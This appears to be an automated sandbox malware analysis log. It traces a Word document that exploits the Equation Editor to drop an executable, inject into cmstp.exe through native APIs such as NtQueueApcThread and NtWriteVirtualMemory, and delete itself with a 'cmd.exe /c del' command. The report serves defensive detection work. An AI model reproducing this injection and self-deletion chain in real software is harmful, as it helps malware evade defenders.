Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041D359 5_2_0041D359
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00408C6B 5_2_00408C6B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00408C70 5_2_00408C70
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0041C559 5_2_0041C559
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABE0C6 5_2_00ABE0C6
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AED005 5_2_00AED005
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B3D06D 5_2_00B3D06D
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC3040 5_2_00AC3040
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AD905A 5_2_00AD905A
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABE2E9 5_2_00ABE2E9
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B61238 5_2_00B61238
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B663BF 5_2_00B663BF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABF3CF 5_2_00ABF3CF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AE63DB 5_2_00AE63DB
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC2305 5_2_00AC2305
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B0A37B 5_2_00B0A37B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC7353 5_2_00AC7353
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AD1489 5_2_00AD1489
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AF5485 5_2_00AF5485
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B4443E 5_2_00B4443E
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AFD47D 5_2_00AFD47D
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B405E3 5_2_00B405E3
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ADC5F0 5_2_00ADC5F0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC351F 5_2_00AC351F
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B06540 5_2_00B06540
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC4680 5_2_00AC4680
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ACE6C1 5_2_00ACE6C1
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B0A634 5_2_00B0A634
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B62622 5_2_00B62622
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ACC7BC 5_2_00ACC7BC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B4579A 5_2_00B4579A
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AF57C3 5_2_00AF57C3
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B5F8EE 5_2_00B5F8EE
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B3F8C4 5_2_00B3F8C4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AE286D 5_2_00AE286D
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ACC85C 5_2_00ACC85C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AC29B2 5_2_00AC29B2
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B6098E 5_2_00B6098E
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AD69FE 5_2_00AD69FE
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B45955 5_2_00B45955
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B4394B 5_2_00B4394B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B73A83 5_2_00B73A83
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B6CBA4 5_2_00B6CBA4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B4DBDA 5_2_00B4DBDA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ABFBD7 5_2_00ABFBD7
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AE7B00 5_2_00AE7B00
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B5FDDD 5_2_00B5FDDD
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AF0D3B 5_2_00AF0D3B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ACCD5B 5_2_00ACCD5B
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AF2E2F 5_2_00AF2E2F
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00ADEE4C 5_2_00ADEE4C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B5CFB1 5_2_00B5CFB1
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00B32FDC 5_2_00B32FDC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AD0F3F 5_2_00AD0F3F
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AEDF7C 5_2_00AEDF7C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00146F06 5_2_00146F06
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_001408FB 5_2_001408FB
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00140902 5_2_00140902
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_001432FF 5_2_001432FF
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00143302 5_2_00143302
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00141359 5_2_00141359
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00141362 5_2_00141362
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00147D02 5_2_00147D02
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_001457B2 5_2_001457B2
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_0006A035 5_2_0006A035
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C1238 7_2_020C1238
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201E2E9 7_2_0201E2E9
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02022305 7_2_02022305
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02027353 7_2_02027353
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0206A37B 7_2_0206A37B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C63BF 7_2_020C63BF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201F3CF 7_2_0201F3CF
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020463DB 7_2_020463DB
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0204D005 7_2_0204D005
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02023040 7_2_02023040
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203905A 7_2_0203905A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0209D06D 7_2_0209D06D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201E0C6 7_2_0201E0C6
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C2622 7_2_020C2622
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0206A634 7_2_0206A634
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02024680 7_2_02024680
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202E6C1 7_2_0202E6C1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A579A 7_2_020A579A
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202C7BC 7_2_0202C7BC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020557C3 7_2_020557C3
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A443E 7_2_020A443E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0205D47D 7_2_0205D47D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02055485 7_2_02055485
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02031489 7_2_02031489
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202351F 7_2_0202351F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02066540 7_2_02066540
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A05E3 7_2_020A05E3
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203C5F0 7_2_0203C5F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020D3A83 7_2_020D3A83
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02047B00 7_2_02047B00
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020CCBA4 7_2_020CCBA4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020ADBDA 7_2_020ADBDA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201FBD7 7_2_0201FBD7
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202C85C 7_2_0202C85C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0204286D 7_2_0204286D
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0209F8C4 7_2_0209F8C4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BF8EE 7_2_020BF8EE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A394B 7_2_020A394B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020A5955 7_2_020A5955
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020C098E 7_2_020C098E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020229B2 7_2_020229B2
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020369FE 7_2_020369FE
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02052E2F 7_2_02052E2F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0203EE4C 7_2_0203EE4C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02030F3F 7_2_02030F3F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0204DF7C 7_2_0204DF7C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BCFB1 7_2_020BCFB1
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02092FDC 7_2_02092FDC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02050D3B 7_2_02050D3B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0202CD5B 7_2_0202CD5B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020BFDDD 7_2_020BFDDD
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AD22F 7_2_000AD22F
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000AC94E 7_2_000AC94E
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00098C6B 7_2_00098C6B
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00098C70 7_2_00098C70
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00092D90 7_2_00092D90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_00092FB0 7_2_00092FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00ABE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B2F970 appears 84 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B03F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00ABDF5C appears 121 times
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: String function: 00B0373B appears 245 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0208F970 appears 84 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0201DF5C appears 121 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0206373B appears 245 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 02063F92 appears 132 times
Source: C:\Windows\SysWOW64\cmstp.exe Code function: String function: 0201E2A8 appears 38 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004185D0 NtCreateFile, 5_2_004185D0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00418680 NtReadFile, 5_2_00418680
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00418700 NtClose, 5_2_00418700
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004187B0 NtAllocateVirtualMemory, 5_2_004187B0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004185CA NtCreateFile, 5_2_004185CA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004186FA NtClose, 5_2_004186FA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_004187AA NtAllocateVirtualMemory, 5_2_004187AA
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB00C4 NtCreateFile,LdrInitializeThunk, 5_2_00AB00C4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0078 NtResumeThread,LdrInitializeThunk, 5_2_00AB0078
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00AB0048
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB07AC NtCreateMutant,LdrInitializeThunk, 5_2_00AB07AC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF9F0 NtClose,LdrInitializeThunk, 5_2_00AAF9F0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF900 NtReadFile,LdrInitializeThunk, 5_2_00AAF900
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_00AAFAE8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_00AAFAD0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_00AAFBB8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_00AAFB68
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_00AAFC90
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_00AAFC60
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFD8C NtDelayExecution,LdrInitializeThunk, 5_2_00AAFD8C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_00AAFDC0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_00AAFEA0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_00AAFED0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFFB4 NtCreateSection,LdrInitializeThunk, 5_2_00AAFFB4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB10D0 NtOpenProcessToken, 5_2_00AB10D0
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0060 NtQuerySection, 5_2_00AB0060
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB01D4 NtSetValueKey, 5_2_00AB01D4
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB010C NtOpenDirectoryObject, 5_2_00AB010C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1148 NtOpenThread, 5_2_00AB1148
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF8CC NtWaitForSingleObject, 5_2_00AAF8CC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAF938 NtWriteFile, 5_2_00AAF938
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1930 NtSetContextThread, 5_2_00AB1930
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFAB8 NtQueryValueKey, 5_2_00AAFAB8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFA20 NtQueryInformationFile, 5_2_00AAFA20
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFA50 NtEnumerateValueKey, 5_2_00AAFA50
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFBE8 NtQueryVirtualMemory, 5_2_00AAFBE8
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFB50 NtCreateKey, 5_2_00AAFB50
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC30 NtOpenProcess, 5_2_00AAFC30
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFC48 NtSetInformationFile, 5_2_00AAFC48
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB0C40 NtGetContextThread, 5_2_00AB0C40
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AB1D80 NtSuspendThread, 5_2_00AB1D80
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFD5C NtEnumerateKey, 5_2_00AAFD5C
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFE24 NtWriteVirtualMemory, 5_2_00AAFE24
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFFFC NtCreateProcessEx, 5_2_00AAFFFC
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00AAFF34 NtQueueApcThread, 5_2_00AAFF34
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00146F06 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 5_2_00146F06
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Code function: 5_2_00146F12 NtQueryInformationProcess, 5_2_00146F12
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020100C4 NtCreateFile,LdrInitializeThunk, 7_2_020100C4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020107AC NtCreateMutant,LdrInitializeThunk, 7_2_020107AC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_0200FAB8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_0200FAD0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_0200FAE8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FB50 NtCreateKey,LdrInitializeThunk, 7_2_0200FB50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_0200FB68
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_0200FBB8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F900 NtReadFile,LdrInitializeThunk, 7_2_0200F900
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F9F0 NtClose,LdrInitializeThunk, 7_2_0200F9F0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_0200FED0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FFB4 NtCreateSection,LdrInitializeThunk, 7_2_0200FFB4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_0200FC60
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FD8C NtDelayExecution,LdrInitializeThunk, 7_2_0200FD8C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_0200FDC0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010048 NtProtectVirtualMemory, 7_2_02010048
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010060 NtQuerySection, 7_2_02010060
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010078 NtResumeThread, 7_2_02010078
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020110D0 NtOpenProcessToken, 7_2_020110D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0201010C NtOpenDirectoryObject, 7_2_0201010C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011148 NtOpenThread, 7_2_02011148
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_020101D4 NtSetValueKey, 7_2_020101D4
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FA20 NtQueryInformationFile, 7_2_0200FA20
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FA50 NtEnumerateValueKey, 7_2_0200FA50
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FBE8 NtQueryVirtualMemory, 7_2_0200FBE8
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F8CC NtWaitForSingleObject, 7_2_0200F8CC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011930 NtSetContextThread, 7_2_02011930
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200F938 NtWriteFile, 7_2_0200F938
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FE24 NtWriteVirtualMemory, 7_2_0200FE24
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FEA0 NtReadVirtualMemory, 7_2_0200FEA0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FF34 NtQueueApcThread, 7_2_0200FF34
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FFFC NtCreateProcessEx, 7_2_0200FFFC
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC30 NtOpenProcess, 7_2_0200FC30
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02010C40 NtGetContextThread, 7_2_02010C40
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC48 NtSetInformationFile, 7_2_0200FC48
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FC90 NtUnmapViewOfSection, 7_2_0200FC90
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_0200FD5C NtEnumerateKey, 7_2_0200FD5C
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_02011D80 NtSuspendThread, 7_2_02011D80
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A85D0 NtCreateFile, 7_2_000A85D0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8680 NtReadFile, 7_2_000A8680
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A8700 NtClose, 7_2_000A8700
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A87B0 NtAllocateVirtualMemory, 7_2_000A87B0
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A85CA NtCreateFile, 7_2_000A85CA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A86FA NtClose, 7_2_000A86FA
Source: C:\Windows\SysWOW64\cmstp.exe Code function: 7_2_000A87AA NtAllocateVirtualMemory, 7_2_000A87AA
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp.0.dr OLE indicator has summary info: false
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: ashlyzx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ashlkyvc7592.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe Jump to behavior
